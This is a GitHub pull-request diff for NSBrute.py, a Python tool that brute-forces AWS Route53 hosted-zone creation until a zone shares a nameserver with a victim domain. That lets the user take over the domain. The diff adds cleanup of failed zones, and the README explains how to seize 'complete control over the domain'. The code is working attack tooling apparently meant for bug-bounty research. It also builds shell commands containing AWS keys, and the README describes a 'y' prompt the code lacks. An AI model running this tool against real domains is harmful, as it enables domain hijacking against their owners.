Merge pull request #6 from mardinyadegar/delete_only_created

Delete only created
shivsahni · Apr 6, 2020 · 45d4e11 · 45d4e11
2 parents d2f5bc6 + 4fc3e8f
commit 45d4e11
Show file tree

Hide file tree

Showing 2 changed files with 116 additions and 40 deletions.
diff --git a/NSBrute.py b/NSBrute.py
@@ -3,6 +3,9 @@
 import time
 import traceback
 import dns.resolver
+import subprocess
+import json
+import ast
 
 accessKey=""
 secretKey=""
@@ -50,8 +53,10 @@ def myPrint(text, type):
 	if(type=="SECURE"):
 		print bcolors.OKGREEN+bcolors.BOLD+text+bcolors.ENDC
 
-#python NSTakeover.py -d domain -a accessKey -s secretKey -ns a,b,c,d
+#python NSBrute.py -d domain -a accessKey -s secretKey -ns a,b,c,d -f
 
+zones_to_keep = []
+forceDelete = False
 
 if (len(sys.argv)<7):
 	myPrint("Please provide the required arguments to initiate scanning.", "ERROR")
@@ -66,6 +71,9 @@ def myPrint(text, type):
 	accessKey=sys.argv[4]
 if (sys.argv[5]=="-s" or sys.argv[5]=="--secretKey"):
 	secretKey=sys.argv[6]
+if len(sys.argv) >= 8:
+	if (sys.argv[7]=="-f" or sys.argv[7]=="--forceDelete"):
+		forceDelete =  True
 try:
 	nsRecords = dns.resolver.query(victimDomain, 'NS')
 except:
@@ -88,45 +96,106 @@ def myPrint(text, type):
     aws_access_key_id=accessKey,
     aws_secret_access_key=secretKey,
 )
-#While modifying the script if something goes wrong and you accidently end up creating shit loads of Zones you might need this logic for automated deletion of zones
-# i=0
-# listOfZoneIDs=[""]
-# for zoneId in listOfZoneIDs:
-# 	zone=conn.get_hosted_zone_by_id(zoneId)
-# 	zone.delete()
-# 	print i
-# 	i=i+1
 
+created_zones = []
+successful_zone = []
 counter=0
-while True:
-	counter=counter+1
-	myPrint("Iteration Count: "+str(counter),"INFO_WS")
-	try: 
-		new_zone=0
-		new_zone, change_info = conn.create_hosted_zone(
-	    victimDomain, comment='zaheck'
-		)
-		#Erroneous Condition
-		if new_zone is None:
+try:
+
+	while True:
+		counter=counter+1
+		myPrint("Iteration Count: "+str(counter),"INFO_WS")
+		try: 
+			new_zone=0
+			new_zone, change_info = conn.create_hosted_zone(
+			# in honor of bagipro, we love your reports, we hope you never stop researching and participating in bug bounty
+		    victimDomain, comment='zaheck'
+			)
+			hosted_zone_id = new_zone.__dict__["id"]
+			created_zones.append(hosted_zone_id)
+			#Erroneous Condition
+			if new_zone is None:
+				continue
+			nsAWS=new_zone.nameservers
+			myPrint("Created a new zone with following NS: ","INFO_WS")
+			myPrint(" ".join(nsAWS),"INFO_WS")
+			intersection=set(nsAWS).intersection(set(targetNS))
+			if(len(intersection)==0):
+				myPrint("No common NS found, deleting new zone","ERROR")
+				print ""
+				new_zone.delete()
+			else:
+				myPrint("Successful attempt after "+str(counter)+" iterations.","SECURE")
+				myPrint("Check your AWS account, the work is done!","SECURE")
+				print "This is the hijacked Zone ID: " + str(hosted_zone_id)
+				hijacked_zone = next(iter(intersection))
+				print "This is the zone you hijacked: " + str(hijacked_zone)
+				successful_zone.append(hosted_zone_id)
+				created_zones.remove(hosted_zone_id)
+				print ""
+				break
+		except Exception as e:
+			myPrint("Exceptional behaviour observed while creating the zone.", "ERROR")
+			myPrint("Trying Again!","ERROR")
+			if new_zone != 0:
+				new_zone.delete()
 			continue
-		nsAWS=new_zone.nameservers
-		myPrint("Created a new zone with following NS: ","INFO_WS")
-		myPrint("".join(nsAWS),"INFO_WS")
-		intersection=set(nsAWS).intersection(set(targetNS))
-		if(len(intersection)==0):
-			myPrint("No common NS found, deleting new zone","ERROR")
-			print ""
-			new_zone.delete()
-		else:
-			myPrint("Successful attempt after "+str(counter)+" iterations.","SECURE")
-			myPrint("Check your AWS account, the work is done!","SECURE")
-			print ""
-			exit(0)
-	except Exception as e:
-		myPrint("Exceptional behaviour observed while creating the zone.", "ERROR")
-		myPrint("Trying Again!","ERROR")
-		if new_zone != 0:
-			new_zone.delete()
-		continue
 
+except KeyboardInterrupt:
+	if forceDelete and len(created_zones) != 0:
+		command = "AWS_ACCESS_KEY_ID="+accessKey+" AWS_SECRET_ACCESS_KEY="+secretKey+" aws route53 list-hosted-zones"
+		out = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
+		stdout,stderr = out.communicate()
+		json_data = None
+
+		if stdout != 'false':
+			json_data = json.loads(stdout)
+
+		zones_to_be_removed = []
+		zones_for_account = []
+
+		for zone in json_data["HostedZones"]:
+			zones_for_account.append(str(zone["Id"].replace("/hostedzone/","")))
+
+		if len(successful_zone) != 0:
+			if successful_zone[0] in created_zones:
+				created_zones.remove(successful_zone[0])
+
+		for zone in created_zones:
+			if zone in zones_for_account:
+				zones_to_be_removed.append(zone)
+
+		for zone in zones_to_be_removed:
+			command = "AWS_ACCESS_KEY_ID="+accessKey+" AWS_SECRET_ACCESS_KEY="+secretKey+" aws route53 delete-hosted-zone --id " + str(zone)
+			out = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
+			stdout,stderr = out.communicate()
+
+	else:
+		exit()
+
+command = "AWS_ACCESS_KEY_ID="+accessKey+" AWS_SECRET_ACCESS_KEY="+secretKey+" aws route53 list-hosted-zones"
+out = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
+stdout,stderr = out.communicate()
+json_data = None
+
+if stdout != 'false':
+	json_data = json.loads(stdout)
+
+zones_to_be_removed = []
+zones_for_account = []
+
+for zone in json_data["HostedZones"]:
+	zones_for_account.append(str(zone["Id"].replace("/hostedzone/","")))
+
+if len(successful_zone) != 0:
+	if successful_zone[0] in created_zones:
+		created_zones.remove(successful_zone[0])
+
+for zone in created_zones:
+	if zone in zones_for_account:
+		zones_to_be_removed.append(zone)
 
+for zone in zones_to_be_removed:
+	command = "AWS_ACCESS_KEY_ID="+accessKey+" AWS_SECRET_ACCESS_KEY="+secretKey+" aws route53 delete-hosted-zone --id " + str(zone)
+	out = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
+	stdout,stderr = out.communicate()
diff --git a/README.md b/README.md
@@ -18,14 +18,21 @@ pip install -r requirements.txt
 ```
 
 Once the script is cloned, and the requirements have been successfully installed, run the script using your AWS Access Key and Secret Key as shown below:
-```
-python NSBrute.py -d domain -a accessKey -s secretKey
+```bash
+python NSBrute.py -d domain -a accessKey -s secretKey 
 
 ```
+If you want to force delete the failed zones you made during testing, you can ran a command similar to this (provide a `-f` at the end):
+```bash
+python NSBrute.py -d domain -a accessKey -s secretKey -f
+```
+
 The script would be indefinitely creating the zones for the vulnerable domains in your AWS account until it finds a zone with a common nameserver.
 
 <img src="https://github.com/shivsahni/RawContent/blob/master/1.png" align="middle" width="700" height="400">
 
 Once the script creates a zone with a common nameserver you can log in to your AWS account to create the resource records for the domain to have the complete control over the domain.
 
 <img src="https://github.com/shivsahni/RawContent/blob/master/21.png" align="middle" width="700" height="400">
+
+If you want to terminate the script while it is still running, control + c will cause it to stop running and you will be prompted to provide `y` to force delete any stale hosted zones or literally any other character sequence to just quit immediately.